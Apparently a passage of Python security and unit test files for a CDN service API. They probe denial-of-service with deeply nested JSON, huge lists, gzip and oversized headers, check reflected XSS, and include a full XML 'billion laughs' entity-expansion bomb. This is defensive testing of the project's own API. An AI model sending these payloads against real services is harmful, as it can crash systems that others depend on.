kwargs = {"headers": headers, "data": attack_string.encode("utf-8")}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_create_flavor_with_big_project_id(self):
"""
Check whether it is possible to kill the application by
creating service with big X-Project-Id header.
"""
failed_count = 0
for k in range(2500, 8000, 500):
self.reset_defaults()
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": "1"*k,
"Content-Type": "application/json"}
kwargs = {"headers": headers}
self.flavor_id = str(uuid.uuid1())
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
#self.assertTrue(resp.status_code < 503)
if (resp.status_code == 503):
failed_count += 1
resp = self.client.list_services(requestslib_kwargs=kwargs)
if (resp.status_code == 503):
failed_count += 1
self.assertTrue(failed_count <= 3)
#self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_16_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-16 encoding.
"""
# create a payload with malicous json blob
attack_string = self.create_malicious_json(400)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-16")}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_gzip_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with gzip.
"""
# create a payload with malicous json blob
attack_string = self.create_malicious_json(2500)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id,
"Content-Encoding": "gzip"}
kwargs = {"headers": headers, "data": self.data_zip(attack_string)}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_dos_create_flavor_provider_list(self):
"""
Check whether it is possible to kill the application by
creating a flavor with huge list of providers.
"""
# create a huge list of domain
self.reset_defaults()
for k in range(1, 30000):
self.provider_list.append({"provider": "%s" % k,
"links": [{"href": "www.watermelon.com",
"rel": "provider_url"}]})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.flavor_id = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_flavor_provider_list_links(self):
"""
Check whether it is possible to kill the application by
creating a flavor with a huge list links within provider list.
"""
# create a huge list of links
self.reset_defaults()
for k in range(1, 15000):
self.provider_list[0]["links"].append(
{"href": "i%s" % k,
"rel": "/index.htm"})
# send 10 requests
for k in range(1, self.MAX_ATTEMPTS):
self.flavor_id = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_flavor_limits_list(self):
"""
Check whether it is possible to kill the application by
creating a flavor with huge list of origins.
"""
# create a huge list of origins
self.reset_defaults()
self.limits_list.append({"domains": {"min": 1, "max": 5}})
self.limits_list.append({"caching": {"min": 3600,
"max": 604800, "incr": 300}})
for k in range(1, 9000):
self.limits_list.append({"origins": {"min": "%s" % k, "max": 5}})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.flavor_id = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_list_flavors_huge_junk(self):
"""
Check whether it is possible to kill the application by
listing all flavors with a huge junk parameter
"""
# create a huge list of junk
attack_string = "1" * 3500
params = {"junk": attack_string}
resp = self.client.list_flavors(param=params)
self.assertTrue(resp.status_code < 503)
def tearDown(self):
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestDOSCreateFlavor, self).tearDown()
```
#### File: security/flavors/test_xss_flavors.py
```python
import uuid
import re
from re import search
import ddt
from nose.plugins import attrib
#from tests.api import base
from tests.api import providers
#from tests.api.utils.schema import services
VULNERABLE_MESSAGE = "Reflected XSS found"
@ddt.ddt
class TestXSSCreateFlavor(providers.TestProviderBase):
"""Security Tests for Fuzzing Create Service."""
def setUp(self):
super(TestXSSCreateFlavor, self).setUp()
self.reset_defaults()
def reset_defaults(self):
"""
Reset provider_list, limits
and flavor_id to its default value.
"""
self.provider_list = [{"provider": "fastly",
"links": [{"href": "www.watermelon.com",
"rel": "provider_url"}]}]
self.limits_list = [{"origins": {"min": 1, "max": 5}},
{"domains": {"min": 1, "max": 5}},
{"caching": {"min": 3600,
"max": 604800, "incr": 300}}]
self.flavor_id = str(uuid.uuid1())
def check(self, resp, xss_string):
matched_xss_string = search(re.escape(xss_string), resp.content, re.I)
if (matched_xss_string is not None):
self.assertTrue(0, VULNERABLE_MESSAGE)
def check_one_request(self, xss_string):
"""
Check the response of one request
"""
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list)
self.check(resp, xss_string)
self.client.delete_flavor(flavor_id=self.flavor_id)
@attrib.attr('security')
@ddt.file_data('../services/data_xss.json')
def test_xss_flavor_id(self, test_data):
self.flavor_id = test_data['xss_string']
self.check_one_request(self.flavor_id)
self.reset_defaults()
@attrib.attr('security')
@ddt.file_data('../services/data_xss.json')
def test_xss_provider(self, test_data):
test_string = test_data['xss_string']
for key in self.provider_list[0]:
self.flavor_id = str(uuid.uuid1())
# to do. This is currently tied with existing examples.
if isinstance(self.provider_list[0][key], (list)):
for the_key in self.provider_list[0][key][0]:
self.provider_list[0][key][0][the_key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
else:
self.provider_list[0][key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
@attrib.attr('security')
@ddt.file_data('../services/data_xss.json')
def test_xss_limits(self, test_data):
test_string = test_data['xss_string']
for i in range(len(self.limits_list)):
for key in self.limits_list[i]:
self.flavor_id = str(uuid.uuid1())
# to do. This is currently tied with existing examples.
if isinstance(self.limits_list[i][key], (dict)):
for the_key in self.limits_list[i][key]:
self.limits_list[i][key][the_key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
else:
self.limits_list[i][key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
def tearDown(self):
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestXSSCreateFlavor, self).tearDown()
```
#### File: security/services/test_dos_services.py
```python
import uuid
import ddt
import gzip
import StringIO
from nose.plugins import attrib
from tests.api import providers
@ddt.ddt
class TestDOSCreateService(providers.TestProviderBase):
"""Security Tests for Denail of Service vulnerablities
for creating Service."""
def setUp(self):
"""
Setup for the tests
"""
super(TestDOSCreateService, self).setUp()
self.domain_list = [{"domain": "mywebsite%s.com" % uuid.uuid1()}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.restrictions_list = [
{
u"name": u"website only",
u"rules": [
{
u"name": "mywebsite.com",
u"referrer": "mywebsite.com"
}
]
}
]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
self.MAX_ATTEMPTS = 30
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
def reset_defaults(self):
"""
Reset domain_list, origin_list, caching_list, service_name
and flavor_id to its default value.
"""
self.domain_list = [{"domain": "mywebsite%s.com" % uuid.uuid1()}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
def create_invalid_json(self, length):
"""
Create invalid_json like [[[[[[[[[[[[[test]]]]]]]]]]]]]
"""
str = ""
str += "[" * length
str += "\"test\""
str += "]" * length
return str
def create_malicious_json(self, length):
"""
Create malicious json like {{{{t:{{{{{}}}}}}}}}
"""
str = "{"
for k in range(0, length):
str += "\"t%s\":{" % k
str += "\"t\":\"t\""
for k in range(0, length):
str += "}"
str += "}"
return str
def data_zip(self, data):
"""
zip the data using gzip format
"""
stringio = StringIO.StringIO()
gzip_file = gzip.GzipFile(fileobj=stringio, mode='wb')
gzip_file.write(data)
gzip_file.close()
return stringio.getvalue()
def check_one_request(self):
"""
Check the response of one request to see whether one request can
kill the application.
"""
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
# delete the service
self.assertTrue(resp.status_code < 503)
if self.service_url != '':
self.client.delete_service(location=self.service_url)
@attrib.attr('security')
def test_invalid_json_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big invalid json blob.
"""
# create a payload with invalid json blob
attack_string = self.create_invalid_json(2500)
kwargs = {"data": attack_string}
print kwargs
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob.
"""
# create a payload with malicous json blob
attack_string = self.create_malicious_json(900)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_8_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-8 encoding.
"""
# create a payload with malicous json blob
attack_string = self.create_malicious_json(800)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-8")}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_create_service_with_big_project_id(self):
"""
Check whether it is possible to kill the application by
creating service with big X-Project-Id header.
"""
failed_count = 0
for k in range(2500, 8000, 500):
self.reset_defaults()
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": "1"*k,
"Content-Type": "application/json"}
kwargs = {"headers": headers}
self.service_name = str(uuid.uuid1())
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
#self.assertTrue(resp.status_code < 503)
if (resp.status_code == 503):
failed_count += 1
resp = self.client.list_services(requestslib_kwargs=kwargs)
if (resp.status_code == 503):
failed_count += 1
self.assertTrue(failed_count <= 3)
#self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_16_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-16 encoding.
"""
# create a payload with malicous json blob
attack_string = self.create_malicious_json(400)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-16")}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_gzip_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with gzip.
"""
# create a payload with malicious json blob
attack_string = self.create_malicious_json(2500)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id,
"Content-Encoding": "gzip"}
kwargs = {"headers": headers, "data": self.data_zip(attack_string)}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_dos_create_service_domain_list(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list of domains.
"""
# create a huge list of domain
self.reset_defaults()
for k in range(1, 30000):
self.domain_list.append({"domain": "w.t%s.com" % k})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_service_origin_list(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list of origins.
"""
# create a huge list of domain
self.reset_defaults()
for k in range(1, 9000):
self.origin_list.append({"origin": "m%s.com" % k,
"port": 443,
"ssl": False,
"rules": [{"request_url": "/i.htm",
"name": "i"}]})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_service_caching_list(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list of caching.
"""
# create a huge list of domain
self.reset_defaults()
for k in range(1, 16000):
self.caching_list.append({"name": "d%s" % k, "ttl": 3600,
"rules": [{"request_url": "/i.htm",
"name": "i"}]})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_service_caching_list_rules(self):
"""
Check whether it is possible to kill the application by
creating a service with huge list rules within caching list.
"""
# create a huge list of domain
self.reset_defaults()
for k in range(1, 15000):
self.caching_list[1]["rules"].append(
{"name": "i%s" % k,
"request_url": "/index.htm"})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.service_name = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_list_service_huge_limit(self):
"""
Check whether it is possible to kill the application by
listing all services with a huge limit
"""
# create a huge list of domain
attack_string = "1" * 3500
params = {"limit": attack_string, "marker": attack_string}
resp = self.client.list_services(param=params)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_dos_list_service_huge_junk(self):
"""
Check whether it is possible to kill the application by
listing all services with a huge junk parameter
"""
# create a huge list of domain
attack_string = "1" * 3500
params = {"junk": attack_string}
resp = self.client.list_services(param=params)
self.assertTrue(resp.status_code < 503)
def tearDown(self):
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestDOSCreateService, self).tearDown()
```
#### File: security/services/test_patch_services.py
```python
import uuid
import ddt
import re
from nose.plugins import attrib
from tests.api import providers
import time
@ddt.ddt
class TestPatchService(providers.TestProviderBase):
"""Security Tests for possible vulnerablities
for patching calls."""
def setUp(self):
"""
Setup for the tests
"""
super(TestPatchService, self).setUp()
self.domain_list = [{"domain": "mywebsite%s.com" % str(uuid.uuid1())}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
self.MAX_ATTEMPTS = 30
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
#create a service
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
def reset_defaults(self):
"""
Reset domain_list, origin_list, caching_list, service_name
and flavor_id to its default value.
"""
self.domain_list = [{"domain": "mywebsite%s.com" % str(uuid.uuid1())}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
@attrib.attr('security2')
def test_patch_service_multiple_domains(self):
"""
Check whether https is used for all links returned from get_service
calls. If https is not used in any link, the test fails.
"""
for k in range(1, 2000):
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(1, 2):
test_data.append(
{"op": "add",
"path": "/domains/-",
"value": {"domain": "%s%s" % (j, domain_name)}})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
assert resp.status_code == 202
resp = self.client.get_service(location=self.service_url)
assert resp.status_code == 200
@attrib.attr('security')
def test_patch_service_multiple_domains_dos(self):
"""
Create a service and immediately patch the service with large
number of domains.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(1, 60):
test_data.append(
{"op": "add",
"path": "/domains/-",
"value": {"domain": "%s%s" % (j, domain_name)}})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
@attrib.attr('security')
def test_patch_service_add_delete_dos(self):
"""
Create a service and immediately patch the service with large
number of domains.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(1, 30):
test_data.append(
{"op": "add",
"path": "/domains/-",
"value": {"domain": "%s%s" % (j, domain_name)}})
test_data.append(
{"op": "remove",
"path": "/domains/%s" % j})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
@attrib.attr('security')
def test_patch_service_delete_domains_dos(self):
"""
Create a service and immediately patch the service with large
number of domains.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
domain_name = "replacemereplaceme%s.com" % str(uuid.uuid1())
test_data = []
for j in range(0, 60):
test_data.append(
{"op": "remove",
"path": "/domains/%s" % (-1 * j)})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
@attrib.attr('security1')
def test_patch_service_adding_origins_dos(self):
"""
Create a service and add lots of origins.
"""
for k in range(1, 100):
#create a service
self.domain_list = [{"domain":
"mywebsite%s.com" % str(uuid.uuid1())}]
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
test_data = []
for j in range(1, 60):
test_data.append(
{"op": "add",
"path": "/origins/%s" % j,
"value": {"origin": "1.2.3.4", "port": 80, "ssl": false,
"rules": [{"name": "origin",
"request_url": "/origin.htm"}]}})
resp = self.client.patch_service(location=self.service_url,
request_body=test_data)
if resp.status_code == 400:
continue
resp = self.client.get_service(location=self.service_url)
assert resp.status_code < 500
def tearDown(self):
if self.service_url != '':
self.client.delete_service(location=self.service_url)
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestPatchService, self).tearDown()
```
#### File: security/services/test_xml_services.py
```python
import uuid
import ddt
from nose.plugins import attrib
from tests.api import providers
import re
@ddt.ddt
class TestXMLService(providers.TestProviderBase):
"""Security Tests for any XML related Service vulnerablities"""
def setUp(self):
"""
Setup for the tests
"""
super(TestXMLService, self).setUp()
self.domain_list = [{"domain": "mywebsite.com"}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
self.MAX_ATTEMPTS = 30
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
def reset_defaults(self):
"""
Reset domain_list, origin_list, caching_list, service_name
and flavor_id to its default value.
"""
self.domain_list = [{"domain": "mywebsite.com"}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
@attrib.attr('security')
def test_xml_bomb_create_service(self):
"""
Check whether it is possible to kill the application by
creating a service using XML bomb.
"""
# replace content type with application/xml
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id,
"Content-Type": "application/xml"}
attack_string = """
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
"""
kwargs = {"headers": headers, "data": attack_string}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
# delete the service
self.assertTrue(resp.status_code == 400)
match = re.search("Invalid JSON string", resp.text)
self.assertTrue(match is not None)
def tearDown(self):
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestXMLService, self).tearDown()
```
#### File: model/helpers/test_domain.py
```python
import ddt
from poppy.model.helpers import domain
from tests.unit import base
@ddt.ddt
class TestDomain(base.TestCase):
@ddt.unpack
@ddt.data({'domain_name': 'www.mydomain.com',
'changed_domain_name': 'www.changed-domain.com'},
{'domain_name': u'www.düsseldorf-Lörick.com',
'changed_domain_name': u'www.düsseldorf.com'
})
def test_domain(self, domain_name, changed_domain_name):
mydomain = domain.Domain(domain_name)
# test all properties
# domain
self.assertEqual(mydomain.domain, domain_name)
mydomain.domain = changed_domain_name
self.assertEqual(mydomain.domain, changed_domain_name)
my_other_domain = domain.Domain.init_from_dict({"domain": domain_name})
self.assertEqual(my_other_domain.domain, domain_name)
```
#### File: provider/akamai/test_services.py
```python
import json
import uuid
import ddt
import mock
from poppy.model.helpers import domain
from poppy.provider.akamai import services
from poppy.transport.pecan.models.request import service
from tests.unit import base
@ddt.ddt
class TestServices(base.TestCase):
@mock.patch(
'poppy.provider.akamai.services.ServiceController.policy_api_client')
@mock.patch(
'poppy.provider.akamai.services.ServiceController.ccu_api_client')
@mock.patch('poppy.provider.akamai.driver.CDNProvider')
def setUp(self, mock_controller_policy_api_client,
mock_controller_ccu_api_client,
mock_driver):
super(TestServices, self).setUp()
self.driver = mock_driver()
self.driver.akamai_https_access_url_suffix = str(uuid.uuid1())
self.controller = services.ServiceController(self.driver)
@ddt.file_data('domains_list.json')
def test_classify_domains(self, domains_list):
domains_list = [domain.Domain(domain_s) for domain_s in domains_list]
c_domains_list = self.controller._classify_domains(domains_list)
self.assertEqual(domains_list, c_domains_list, 'Domain list not equal'
' classified domain list')
@ddt.file_data('data_service.json')
def test_create_with_exception(self, service_json):
# ASSERTIONS
# create_service
service_obj = service.load_from_json(service_json)
self.controller.policy_api_client.put.side_effect = (
RuntimeError('Creating service failed.'))
resp = self.controller.create(service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_service.json')
def test_create_with_4xx_return(self, service_json):
service_obj = service.load_from_json(service_json)
# test exception
self.controller.policy_api_client.put.return_value = mock.Mock(
status_code=400,
text='Some create service error happened'
)
resp = self.controller.create(service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_service.json')
def test_create_with_multiple_domains(self, service_json):
service_obj = service.load_from_json(service_json)
self.controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
provider_responses = self.controller.create(service_obj)
for provider_name in provider_responses:
provider_response = provider_responses[provider_name]
num_of_domains = len(service_obj.domains)
num_of_links = len(provider_response['links'])
# make sure we have same number of domains and links
self.assertEqual(num_of_domains, num_of_links)
self.controller.policy_api_client.put.assert_called_once()
@ddt.file_data('data_service.json')
def test_create(self, service_json):
service_obj = service.load_from_json(service_json)
self.controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
self.controller.create(service_obj)
self.controller.policy_api_client.put.assert_called_once()
# make sure all the caching rules are processed
self.assertTrue(service_obj.caching == [])
def test_delete_with_exception(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
# test exception
exception = RuntimeError('ding')
self.controller.policy_api_client.delete.side_effect = exception
resp = self.controller.delete(provider_service_id)
self.assertIn('error', resp[self.driver.provider_name])
def test_delete_with_service_id_json_load_error(self):
# This should trigger a json.loads error
provider_service_id = None
resp = self.controller.delete(provider_service_id)
self.assertIn('error', resp[self.driver.provider_name])
def test_delete_with_4xx_return(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
# test exception
self.controller.policy_api_client.delete.return_value = mock.Mock(
status_code=400,
text='Some error happened'
)
resp = self.controller.delete(provider_service_id)
self.assertIn('error', resp[self.driver.provider_name])
def test_delete(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
self.controller.delete(provider_service_id)
self.controller.policy_api_client.delete.assert_called_once()
@ddt.file_data('data_update_service.json')
def test_update_with_get_error(self, service_json):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.policy_api_client.get.return_value = mock.Mock(
status_code=400,
text='Some get error happened'
)
controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
controller.policy_api_client.delete.return_value = mock.Mock(
status_code=200,
text='Delete successful'
)
service_obj = service.load_from_json(service_json)
resp = controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_update_service.json')
def test_update_with_service_id_json_load_error(self, service_json):
# This should trigger a json.loads error
provider_service_id = None
service_obj = service.load_from_json(service_json)
resp = self.controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('error', resp[self.driver.provider_name])
@ddt.file_data('data_update_service.json')
def test_update(self, service_json):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.policy_api_client.get.return_value = mock.Mock(
status_code=200,
text=json.dumps(dict(rules=[]))
)
controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
controller.policy_api_client.delete.return_value = mock.Mock(
status_code=200,
text='Delete successful'
)
service_obj = service.load_from_json(service_json)
resp = controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('id', resp[self.driver.provider_name])
@ddt.file_data('data_update_service.json')
def test_update_with_domain_protocol_change(self, service_json):
provider_service_id = json.dumps([{'policy_name': "densely.sage.com",
'protocol': 'http'}])
